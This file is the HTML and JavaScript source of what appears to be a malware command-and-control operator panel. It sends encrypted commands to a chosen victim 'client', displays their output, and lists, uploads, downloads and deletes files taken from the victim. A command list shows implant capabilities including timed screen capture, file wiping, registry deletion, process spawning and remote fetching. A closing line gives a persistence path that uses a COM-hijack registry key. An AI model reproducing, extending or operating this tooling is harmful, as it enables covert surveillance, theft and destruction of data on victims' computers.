<html>
<head>
    <meta id="metatag" http-equiv="Content-Type" charset="UTF-8">
    <script src="lib\jquery-3.1.0.min.js"></script>
    <script src="lib\encript.js"></script>
    <script src="lib\common.js"></script>
    <script>
    // Timer
    var seconds = 0;
    var t;

    function add() {
        $('#timer').html(seconds + " secs</b>");
        seconds++;
        setTimer(add, 1000);
    }

    function setTimer() {
        t = setTimeout(add, 1000);
    }

    function resetTimer() {
        seconds = 0;
    }

    $(document).ready(function() {
        getInfomation();
        getCommand();
        getTime();
        listOfFiles();
        setTimer();
        refresh();
        var href = "collector-list.html?user=" + encodeURIComponent(getQueryString["user"]);
        $("#backToTargetLists").attr("href", href);
    });

    function getCommand() {
        $.getJSON(domain + "service.php?cmd=getCommand&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            if (obj)
                $("#command").attr("value", dataDecode(obj));
        });
    }

    function getListOfUrls() {
        $.getJSON(domain + "service.php?cmd=getUrl&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
        });
    }

    function sendCommand() {
        var encryrptCommand = dataEncode($("#command").val());
        $.getJSON(domain + "service.php?cmd=sendCommand&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]) + "&userCommand=" + encodeURIComponent(encryrptCommand), function(obj){
                resetTimer();
        });

    }

    function clearCommand() {
        $("#command").val('');
        $("#command").focus();
    }

    function getInfomation() {
        $.getJSON(domain + "service.php?cmd=information&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            var decryptInformation = dataDecode(obj);

            // User
            var sysUser = decryptInformation.split("\n");
            $('#sysUser').text(sysUser[1]);
        });
    }

    function refresh() {
        $.getJSON(domain + "service.php?cmd=refresh&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            $('#result').text(dataDecode(obj));
            getTime();
            //clearCommand();
        });
    }

    function getTime() {
        $.getJSON(domain + "service.php?cmd=time&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            $('#lastConnection').html("Last connection : <b>" + obj + "</b>");
        });
    }

    function listOfFiles() {
        $('#lists tr').remove();
        $('#fileData').val('');
        $.getJSON(domain + "service.php?cmd=listOfFiles&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            $('#cntOfFiles').text("Uploaded files (" + obj.length + ")");
            $.each(obj, function(key, value) {
                $('#lists').append("<tr><td align=left><a href=\"" + value.path + "\">" + dataBase64Decode(value.name) + "</a></td><td align=right>&nbsp;&nbsp;&nbsp;" + value.size + "</td><td><button id=\""+ value.name + "\" onclick=\"deleteFile();\">Delete</button></td><td align=left>&nbsp;&nbsp;&nbsp;" + value.path + "</td></tr>");
            });
        });
    }

    function deleteFile() {
        var e = window.event;
        btn = e.target || e.srcElement;
        $.getJSON(domain + "service.php?cmd=deleteFile&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]) + "&file=" + encodeURIComponent(btn.id), function(obj) {
            // $('#lists').empty();
            listOfFiles();
        });
    }

    function deleteAllFiles() {
        $.getJSON(domain + "service.php?cmd=deleteAllFiles&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]), function(obj) {
            // $('#lists').empty();
            listOfFiles();
        });
    }

    function uploadFile() {
        var file_data = $('#fileData').prop('files')[0];
        var form_data = new FormData();
        form_data.append('file', file_data);
        var url = domain + "service.php?cmd=upload&user=" + encodeURIComponent(getQueryString["user"]) + "&client=" + encodeURIComponent(getQueryString["client"]);

        $.ajax({
                url: url,
                cache: false,
                contentType: false,
                processData: false,
                data: form_data,
                type: 'post',
                error: function(e) {
                    debugConsole(e);
                },
                success: function(response){
                    //listOfFiles();
                    alert("Upload has completed");

                }
         });
    }
    </script>
    <title>Relay List</title>
</head>
<body>
    <a id="backToTargetLists" href="collector-list.html">Back to Target Lists</a>
    <table cellpadding="3" width=100%>
    <tr><td>
        <hr><h2 id="sysUser"></h2>
    </td></tr>
    <tr><td>
        <input id="command" type="text" size="85" value="" onkeypress="if(event.keyCode==13) { sendCommand(); return false; }">
        <button id="cmdBtn" onclick="sendCommand();">Send Command</button>
        <button id="clearBtn" onclick="clearCommand();">Clear Command</button>
        <font size=3><span id="timer"></span></font>
    </td></tr>
    <tr><td>
        <hr><button id="refresh" onclick="refresh();">Refresh</button>&nbsp;&nbsp;&nbsp;<font size=3 id="lastConnection"></font>
    </td></tr>
    <tr><td>
        <table width=100% cellpadding="5" >
            <tr><td bgcolor=#000000><font color=#DDDDDD><pre id="result"><br></pre></font>
            </td></tr>
        </table>
    </td></tr>
    <tr><td>
        <hr>
        <h2 id="cntOfFiles">Uploaded files</h2>
    </td></tr>
    <tr><td>
        <button id="cmdBtn" onclick="listOfFiles();">Reload Files</button>&nbsp;&nbsp;
        <button id="cmdBtn" onclick="deleteAllFiles();">Delete All Files</button>&nbsp;&nbsp;
        <button id="cmdBtn" onclick="getListOfUrls();">List of URL</button>&nbsp;&nbsp;
        Please delete files after downloading.
    </td></tr>
    <tr><td>
        <table id="lists">
    </table>
    </td></tr>
    <tr><td>
        <hr noshade size=1><h2>Selected file for uploading</h2>
        <input id="fileData" type="file" />
        <button id="upload" onclick="uploadFile();">Upload</button>
    </td></tr>
    </table>
    <hr>
    <ul>
        <li>cd (folder)</li>
        <li>upload (file)</li>
        <li>strings (file)</li>
        <li>exit</li>
        <li>httpget (url) - Support for both http and https </li>
        <li>pwd</li>
        <li>reglistall</li>
        <li>timeout (ready/wait)</li>
        <li>rereg - Update Information</li>
        <li style='text-decoration: line-through;'>proclist [Deprecated]</li>
        <li style='text-decoration: line-through;'>prockill [Deprecated]</li>
        <li>procspawn</li>
        <li>diskinfo</li>
        <li>reglist (registry path)</li>
        <li>regvaldel (registry value)</li>
        <li>regkeydel (registry key)</li>
        <li>screenupload (file)</li>
        <li>screenauto (time) - 0 = off, minimum 10 (seconds)</li>
        <li>ddir</li>
        <li style='text-decoration: line-through;'>ddel (file/folder) [Deprecated]</li>
        <li>packetsize (size) - 256~1024(KB)</li>
        <li>activeport</li>
        <li>find (file)</li>
        <li>wipe (file)</li>
        <li style='text-decoration: line-through;'>sdir (dest file) [Deprecated]</li>
        <li>cancel</li>
        <li>ip x.x.x.x - <b>ip off</b></li>
        <li>ld (extension file)</li>
    </ul>
    <hr>
    <ul>
        <li>Install Path : reglist HKEY_CURRENT_USER\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32</li>
    </ul>

</body>
</html>